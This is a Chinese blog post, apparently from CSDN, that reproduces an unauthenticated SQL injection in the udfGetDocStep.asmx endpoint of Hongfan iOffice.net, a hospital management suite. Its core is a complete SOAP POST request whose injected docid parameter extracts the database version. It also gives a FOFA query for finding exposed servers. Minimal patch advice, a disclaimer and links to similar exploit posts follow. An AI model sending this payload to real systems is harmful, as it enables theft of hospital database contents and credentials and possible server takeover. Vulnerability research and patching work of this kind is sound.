红帆ioffice-udfGetDocStep.asmx存在SQL注入漏洞

已于 2024-03-06 17:51:41 修改
阅读量1k 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: sql 数据库 安全 web安全
于 2024-03-06 10:02:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/136497474
版权

产品简介

红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。

漏洞描述

红帆iOffice.net udfGetDocStep.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

资产测绘

app=“红帆-ioffice”

漏洞复现

POST /ioffice/prg/interface/udfGetDocStep.asmx HTTP/1.1
Host: vulIP
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/GetDocStep"
Content-Length: 565

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <GetDocStep xmlns="http://tempuri.org/">
        <docid>1'+(SELECT CHAR(103)+CHAR(105)+CHAR(75)+CHAR(83) WHERE 6621=6621 AND 7795 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(106)+CHAR(122)+CHAR(113)+(SELECT @@version)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(120)+CHAR(113))))+'</docid>
    </GetDocStep>
    </soap:Body>
</soap:Envelope>

查询数据库版本信息
在这里插入图片描述
sqlmap验证
在这里插入图片描述

修复建议

1.升级至安全版本。
2.部署Web应用防火墙,对数据库操作进行监控。

免责声明

本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

红帆OA udfmr.asmx SQL注入漏洞复现
0xSec
08-18 4292
红帆iOffice.netudfmr.asmx接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
红帆OA 多处 SQL注入漏洞复现
0xSec
03-04 1201
红帆iOffice.netioDesktopData.asmx、wssRtSyn.asmx、GetWorkUnit.asmxudfGetDocStep.asmx等接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
漏洞复现】红帆-ioffice-udfGetDocStep-sql注入
知黑而守白
03-05 171
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice udfGetDocStep 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现】红帆-ioffice-CAWS-sql注入
知黑而守白
03-05 225
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice CAWS 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞复现】红帆-ioffice-list-SQL注入漏洞
知黑而守白
01-17 413
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。红帆HFOffice list 接口处存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
漏洞汇总】近十日漏洞汇总(已公布poc)
weixin_45840241的博客
04-27 1070
【代码】【漏洞汇总】近十日漏洞汇总(已公布poc)
漏洞复现-红帆OA系列
aming小老弟
03-15 1763
红帆OA--------------------------------------------fofa:app=“红帆-ioffice
红帆ioffice ioassistance2.asmx sql注入
weixin_43567873的博客
03-10 187
红帆ioffice ioassistance2.asmx sql注入
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
nnn2188185的博客
03-04 312
红帆iOffice ioDesktopData.asmx接口存在SQL注入漏洞 附POC软件
漏洞复现】红帆iOffice.net wssRtSyn接口处存在SQL注入
2301_80127209的博客
06-20 1005
红帆iOffice.net从最早满足医院行政办公需求(传统OA),到目前融合了卫生主管部门的管理规范和众多行业特色应用,是目前唯一定位于解决医院综合业务管理的软件,是最符合医院行业特点的医院综合业务管理平台,是成功案例最多的医院综合业务管理软件。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。帮助你在面试中脱颖而出。
漏洞复现】SQL注入漏洞
zkaqlaoniao的博客
11-09 730
红帆HFOffice医微云是广州红帆科技有限公司研发的专注医疗行政办公管理,与企业微信全方位结合,提供协同办公、知识库、专家系统、BI等应用,进一步帮助医院移动办公落地,成就面向医院管理的“智慧管理”。平台list接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。此漏洞是由于部分用户站点下web.config的Debug的值设置为1,导致系统存在SQL注入漏洞,只需让相关系统站点下web.config的Debug值设为0即可。
SQL 数值计算全解析:ABS、CEIL、FLOOR与ROUND函数深度精讲
Musennn的博客
05-21 685
ABS函数:获取绝对值,处理负数场景CEIL与FLOOR函数:掌握向上/向下取整的方向逻辑ROUND函数:精确控制小数位数,注意进位规则NULL值处理:使用COALESCE函数增强健壮性。
SQL SERVER表中,找出一行数据的多列中的最大值
luckyext的博客
05-23 159
SQL SERVER表中,找出一行数据的多列中的最大值。使用values子句创建临时的数据集,将每行数据构造为只有一个字段的表,再求最大值。
业务场景中使用 SQL 实现快速数据更新与插入
最新发布
ALex_zry的博客
05-23 163
本文介绍了气象数据处理系统中分钟级降水数据的更新和插入实现方法。通过INSERT INTO ... ON DUPLICATE KEY UPDATE语法,可以自动检测并处理数据冲突,实现存在则更新、不存在则插入的功能。文章详细说明了SQL语句构造和C++代码实现步骤,包括数据表结构、动态SQL生成和数据库操作。同时提供了使用注意事项,如性能优化、错误处理和安全性考虑,帮助开发者高效准确地处理气象数据。该方法适用于需要定期更新时间序列数据的应用场景。
Postgresql 数据库体系架构
zyb378747350的专栏
05-23 227
软件目录,数据库目录结构,进程结构
PL/SQL 安装配置与使用
是萝卜干呀的博客
05-20 894
PL/SQL 的安装配置、基础设置和使用;包和包体、存储过程的使用;存储过程的断点调试
SQL 多表关联与分组聚合:解密答题正确率分析
Musennn的博客
05-21 1009
题目要求:计算浙江大学用户在不同难度题目下的答题正确率,并按正确率升序排序。关键分析点:假设各表结构及部分数据:user_profile:question_practice_detail:question_detail:预期结果: 2.2 关键技术点分解 1. 三表关联策略 作用: 通过关联用户与答题记录 通过关联答题记录与题目难度 选择内连接的原因: 仅统计实际答题的用户和题目 排除未答题用户或无难度信息的题目 2. 正确率计算逻辑 分子:统计正确答题数 分母:统计总答题数 ROUN
基于Rust语言的Rocket框架和Sqlx库开发WebAPI项目记录(五)
2301_78858267的博客
05-23 347
在src目录新建login_handle.rs文件目录结构如下:project|—src|—params //封装参数结构体模块|—req.rs //封装请求参数结构体|—resp.rs //封装返回数据结构体|—result_parse.rs //解析返回参数结构体|—mod.rs //导出模块|—common //公共模块|—db.rs //构造数据库连接池|—jwt.rs //处理token|—mistake.rs //处理错误。
deepseek集成ioffice
02-13
### DeepSeek与iOffice集成方案 #### 集成背景说明 DeepSeek作为一个强大的搜索引擎平台,能够帮助企业和组织更高效地管理和检索内部数据。而红帆iOffice作为一款办公自动化软件,在企业日常运营中扮演着重要角色。为了提升工作效率,实现两者之间的无缝对接显得尤为重要。 #### 技术准备事项 在开始集成工作之前,需确认以下几点: - **环境配置** - 确认双方系统的运行环境兼容性。 - 安装必要的依赖库和服务组件。 - **权限设置** - 设置适当的安全策略来保护敏感信息不被未授权访问[^2]。 - 对于涉及到的数据交互部分,应特别关注SQL注入风险防范措施[^1]。 #### API接入流程 针对不同版本的iOffice接口特性,以下是具体的API调用方法: ##### 方法一:通过Web Service方式进行集成 对于支持SOAP协议的服务端点(如`wssRtSyn.asmx`, `ioassistance2.asmx`),可以采用如下Python代码片段完成基本连接测试: ```python from suds.client import Client url = 'http://example.com/wssRtSyn.asmx?wsdl' client = Client(url) response = client.service.someMethod() print(response) ``` ##### 方法二:RESTful风格HTTP请求 如果目标服务提供了基于JSON格式响应的REST API,则推荐使用requests库简化开发过程: ```python import requests api_endpoint = "http://example.com/api/v1/resource" headers = {'Content-Type': 'application/json'} data = {"key": "value"} r = requests.post(api_endpoint, json=data, headers=headers) if r.status_code == 200: result = r.json() else: raise Exception(f"Request failed with status code {r.status_code}") ``` #### 数据同步机制设计 考虑到实际应用场景中的性能需求以及安全性考量,建议采取增量更新模式定期抓取最新变更记录,并利用加密传输通道保障通信安全。 #### 测试验证环节 最后阶段要进行全面的功能性和稳定性检测,确保所有预期功能正常运作的同时也要排查潜在安全隐患,特别是防止SQL注入攻击的发生[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值